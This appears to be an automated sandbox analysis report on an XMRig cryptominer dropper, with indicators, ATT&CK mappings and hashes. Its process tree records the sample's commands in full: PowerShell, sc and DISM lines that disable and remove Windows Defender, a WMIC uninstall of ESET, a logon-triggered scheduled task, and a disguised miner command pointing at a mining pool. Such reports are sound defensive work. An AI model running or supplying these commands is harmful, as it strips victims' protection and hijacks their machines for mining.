xmrig | cebf9560029a7da1155f3152aa91d1c20fb98462cc45b469a9b2faa30bb8534c

Analysis

max time kernel
3s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
03-01-2024 21:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3ed7d668bdaa99bebeac3cc669ebe702.exe
Size

6.4MB
MD5

3ed7d668bdaa99bebeac3cc669ebe702
SHA1

c3e30e088dd7c0812299107ac6ea5e15ea11efbc
SHA256

cebf9560029a7da1155f3152aa91d1c20fb98462cc45b469a9b2faa30bb8534c
SHA512

397ad0a33f10b1fddda8f71fa0cb6fb31085017b388935bf68e02bc9b436c402fa0e74894b6be8d8b72e45b39e6b66e46c1d9a3dc22422556454a4981944d9fb
SSDEEP

196608:lKrD7Ptz/yNGti995FNIew3JfOFzOtNPxjU:aPN/HmTZwEzODJU

Score

10^/10

xmrig discovery evasion miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral2/memory/1924-1720-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/1924-1722-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/1924-1724-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/1924-2460-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/1924-2462-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/1924-2463-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/1924-2461-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/1924-2459-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 1 IoCs

pid	Process
4520	Desktop.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5096	icacls.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
24	freegeoip.app
25	freegeoip.app

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1516	sc.exe
1344	sc.exe
3116	sc.exe
1536	sc.exe
736	sc.exe
228	sc.exe
3168	sc.exe
3960	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1172	schtasks.exe
1804	schtasks.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1288 wrote to memory of 4520	1288	Dism.exe	90
PID 1288 wrote to memory of 4520	1288	Dism.exe	90
PID 1288 wrote to memory of 4520	1288	Dism.exe	90

C:\Users\Admin\AppData\Local\Temp\3ed7d668bdaa99bebeac3cc669ebe702.exe
"C:\Users\Admin\AppData\Local\Temp\3ed7d668bdaa99bebeac3cc669ebe702.exe"
1⤵
PID:1288
- C:\Users\Admin\AppData\Local\Temp\Desktop.exe
  "C:\Users\Admin\AppData\Local\Temp\Desktop.exe"
  2⤵
  - Executes dropped EXE
  PID:4520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\start.bat" "
    3⤵
    PID:4956
  - - C:\Program Files (x86)\CLoader__.exe
      CLoader__ -pimortale -dC:\Program Files (x86)
      4⤵
      PID:5076
    - - C:\Program\CLoader.exe
        
        "C:\Program\CLoader.exe"
        5⤵
        
        PID:4380
  - - C:\Program Files (x86)\CLoader_.exe
      CLoader_ -pimortale2 -dC:\Program Files (x86)
      4⤵
      PID:2256
    - - C:\Program\CLoader 12.5C.exe
        
        "C:\Program\CLoader 12.5C.exe"
        5⤵
        
        PID:2816
      - C:\Program Files\Java\jre-1.8\bin\javaw.exe
        
        "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Program\CLoader 12.5C.exe" org.develnext.jphp.ext.javafx.FXLauncher
        6⤵
        
        PID:4516
        
        C:\Windows\system32\icacls.exe
        
        C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        7⤵
        Modifies file permissions
        
        PID:5096
  - - C:\Program Files (x86)\CLoader___.exe
      CLoader___ -pimortale3 -dC:\Program Files (x86)
      4⤵
      PID:4472
    - - C:\Program\Loader.exe
        
        "C:\Program\Loader.exe"
        5⤵
        
        PID:1536
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
        6⤵
        
        PID:1804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Program'
        7⤵
        
        PID:2256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        7⤵
        
        PID:4272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        7⤵
        
        PID:4192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        7⤵
        
        PID:4412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableArchiveScanning $true
        7⤵
        
        PID:3344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
        7⤵
        
        PID:4884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
        7⤵
        
        PID:736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableScriptScanning $true
        7⤵
        
        PID:2008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
        7⤵
        
        PID:3744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIOAVProtection $true
        7⤵
        
        PID:3736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
        7⤵
        
        PID:1824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
        7⤵
        
        PID:4660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -MAPSReporting Disabled
        7⤵
        
        PID:5004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        7⤵
        
        PID:4388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Stop-Service WinDefend
        7⤵
        
        PID:5040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Program'
        8⤵
        
        PID:2012
        
        C:\Windows\system32\sc.exe
        
        sc stop WinDefend
        7⤵
        Launches sc.exe
        
        PID:1516
        
        C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        7⤵
        Launches sc.exe
        
        PID:1344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-Service WinDefend -StartupType Disabled
        7⤵
        
        PID:2676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
        7⤵
        
        PID:1796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
        7⤵
        
        PID:2256
        
        C:\Windows\system32\Dism.exe
        
        Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
        7⤵
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\0CA1621F-B406-4A3B-A492-209CFB0EA0BB\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\0CA1621F-B406-4A3B-A492-209CFB0EA0BB\dismhost.exe {479F0FC1-E01D-4F68-95B8-27A90F0843B1}
        8⤵
        
        PID:3556
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        Wmic Product where name="Eset Security" call uninstall
        7⤵
        
        PID:1824
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
        6⤵
        
        PID:5044
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
        7⤵
        Creates scheduled task(s)
        
        PID:1172
      - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        6⤵
        
        PID:4960
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
        7⤵
        
        PID:3736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Program'
        8⤵
        
        PID:4856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        8⤵
        
        PID:1716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        8⤵
        
        PID:3580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        8⤵
        
        PID:4472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableArchiveScanning $true
        8⤵
        
        PID:1632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
        8⤵
        
        PID:1932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
        8⤵
        
        PID:3344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableScriptScanning $true
        8⤵
        
        PID:2844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
        8⤵
        
        PID:4928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIOAVProtection $true
        8⤵
        
        PID:4808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
        8⤵
        
        PID:4220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
        8⤵
        
        PID:792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -MAPSReporting Disabled
        8⤵
        
        PID:4324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        
        PID:2060
        
        C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        8⤵
        Launches sc.exe
        
        PID:736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Stop-Service WinDefend
        8⤵
        
        PID:2920
        
        C:\Windows\system32\sc.exe
        
        sc stop WinDefend
        8⤵
        Launches sc.exe
        
        PID:228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-Service WinDefend -StartupType Disabled
        8⤵
        
        PID:2908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
        8⤵
        
        PID:4572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
        8⤵
        
        PID:2160
        
        C:\Windows\system32\Dism.exe
        
        Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1288
        
        C:\Users\Admin\AppData\Local\Temp\A571ED4A-13FB-476B-9829-29B61A310207\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\A571ED4A-13FB-476B-9829-29B61A310207\dismhost.exe {60D17B5A-3E10-4FD8-888E-C86C804D9992}
        9⤵
        
        PID:3180
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        Wmic Product where name="Eset Security" call uninstall
        8⤵
        
        PID:1272
      - C:\Users\Admin\AppData\Roaming\Services.exe
        
        "C:\Users\Admin\AppData\Roaming\Services.exe"
        6⤵
        
        PID:3268
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
        7⤵
        
        PID:436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Program'
        8⤵
        
        PID:4912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        8⤵
        
        PID:3152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        8⤵
        
        PID:5044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        8⤵
        
        PID:2724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableArchiveScanning $true
        8⤵
        
        PID:3448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
        8⤵
        
        PID:408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
        8⤵
        
        PID:2872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableScriptScanning $true
        8⤵
        
        PID:3124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
        8⤵
        
        PID:796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIOAVProtection $true
        8⤵
        
        PID:2116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
        8⤵
        
        PID:928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
        8⤵
        
        PID:4100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -MAPSReporting Disabled
        8⤵
        
        PID:2920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        
        PID:1556
        
        C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        8⤵
        Launches sc.exe
        
        PID:3116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Stop-Service WinDefend
        8⤵
        
        PID:1880
        
        C:\Windows\system32\sc.exe
        
        sc stop WinDefend
        8⤵
        Launches sc.exe
        
        PID:1536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-Service WinDefend -StartupType Disabled
        8⤵
        
        PID:1016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
        8⤵
        
        PID:928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
        8⤵
        
        PID:3580
        
        C:\Windows\system32\Dism.exe
        
        Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
        8⤵
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\A6937FB9-14B5-4911-8293-E30147070F06\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\A6937FB9-14B5-4911-8293-E30147070F06\dismhost.exe {E226F5CA-D704-49A2-AF08-96D4CD04AA00}
        9⤵
        
        PID:4772
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        Wmic Product where name="Eset Security" call uninstall
        8⤵
        
        PID:1244
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
        7⤵
        
        PID:3564
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
        8⤵
        Creates scheduled task(s)
        
        PID:1804
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        7⤵
        
        PID:5036
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
        8⤵
        
        PID:5040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        9⤵
        
        PID:4872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        9⤵
        
        PID:452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        9⤵
        
        PID:2104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableArchiveScanning $true
        9⤵
        
        PID:3020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
        9⤵
        
        PID:1728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
        9⤵
        
        PID:3636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableScriptScanning $true
        9⤵
        
        PID:2576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
        9⤵
        
        PID:4508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIOAVProtection $true
        9⤵
        
        PID:1608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
        9⤵
        
        PID:3256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
        9⤵
        
        PID:2308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -MAPSReporting Disabled
        9⤵
        
        PID:3020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        9⤵
        
        PID:3508
        
        C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        9⤵
        Launches sc.exe
        
        PID:3168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Stop-Service WinDefend
        9⤵
        
        PID:4132
        
        C:\Windows\system32\sc.exe
        
        sc stop WinDefend
        9⤵
        Launches sc.exe
        
        PID:3960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-Service WinDefend -StartupType Disabled
        9⤵
        
        PID:4396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
        9⤵
        
        PID:4772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
        9⤵
        
        PID:1548
        
        C:\Windows\system32\Dism.exe
        
        Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
        9⤵
        
        PID:1004
        
        C:\Users\Admin\AppData\Local\Temp\9A6890C1-E3A3-4930-9951-107A3A55A8F2\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\9A6890C1-E3A3-4930-9951-107A3A55A8F2\dismhost.exe {4478D505-F320-463A-A506-B6F659A62B4C}
        10⤵
        
        PID:3044
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        Wmic Product where name="Eset Security" call uninstall
        9⤵
        
        PID:1532
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6056254 --pass=Skeetv2 --cpu-max-threads-hint=30 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
        7⤵
        
        PID:1924

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program\Loader.exe

Filesize
85KB

MD5
9411616ef53fad124290ccc7733d0411

SHA1
295f63cff49f27e22a9888e3430d728c7e6cd93d

SHA256
74ea577e5b7c7c7e74210e77ae1326cc112384bf03c4f4760b97ba4c4200c92e

SHA512
747534248ff93fd034c7d369c0b243e73e14109a75806bd732b582373c1f82c031b58f69d4ab8997b2e6f689abb152184c45ad61370e39b37499b49e0d28313d

Download Submit
C:\Program\Loader.exe

Filesize
187KB

MD5
6ece2f36023456090da6e6a6f2626755

SHA1
25371a54c4c7cf8ea1c283669342249af4be4a91

SHA256
995dadbc9cc74aac9c2d03a75c3e59bd7eb586f263b619e61407658784731602

SHA512
a5d307f47b7198bd45376cef2653eb4ce175134e627fd66dad8b45ef79f812ee868bc713333ccee7a415288612c045a97655fc317a733cd84d75c6f0cb6ec2a6

Download Submit
C:\Program\Loader.exe

Filesize
35KB

MD5
6f5c225ffa9bb2d91de8008c3d924828

SHA1
a1c1488796035a97f8d7fd050697829f924eae29

SHA256
e05d1766039cc91a7e909e6643e74dc9eb17111211f0c99d6204627314c6a8b7

SHA512
aa7751d91584769bd590f2a2ce38eaa665bd33269421ace5e0d13c3b2a3ee39a144713fb0e27795043a6b27db7bf5705eb1ae76f73f6aa3a9dae0a6e080f3d31

Download Submit
C:\Users\Admin\AppData\Local\44\Process.txt

Filesize
1KB

MD5
b7ef3cf317c7b55744f416ceb9a3334a

SHA1
